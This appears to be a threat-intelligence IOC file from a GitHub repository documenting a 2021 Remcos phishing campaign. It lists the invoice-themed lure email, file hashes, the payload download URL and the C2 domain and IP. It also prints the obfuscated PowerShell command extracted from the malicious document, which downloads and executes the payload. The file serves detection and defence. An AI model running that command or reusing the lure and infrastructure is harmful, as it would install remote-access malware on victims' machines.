-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-12 Remcos IOCs
49 lines (35 loc) · 1.02 KB
/
2021-10-12 Remcos IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
Confirming that you have the following invoices
SENDERS OBSERVED
EMAIL BODY
Hello,
Attached find past due invoice details for your records,
Kind regards,
Nidia Ferguson
MARBRAN USA
P: 956-630-2946
F: 956-984-0489
MALDOC FILE HASHES
past due invoice.xls
2850009ae628ee537c6a956be4393bdd
southernrock.cmd
856b81f09be9693ef4ee8e2131b0ec58
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents\samples>powershell -w hi sleep -Se 31;Start-BitsTrans
fer -Source htt`p://greenpayindia.com/grren/ConsoleApp17.e`xe -Destination C:\Us
ers\Public\Documents\callscore.e`xe;C:\Users\Public\Documents\callscore.e`xe
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/grren/ConsoleApp17.exe
REMCOS PAYLOAD FILE HASH
callscore.exe
0497faff25c24f11d0813f8da6b5c2d7
It was renamed and copied as:
taskmgr.exe
0497faff25c24f11d0813f8da6b5c2d7
REMCOS C2
lplazadtemins.duckdns.org
194.147.140.45:443
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=greenpayindia.com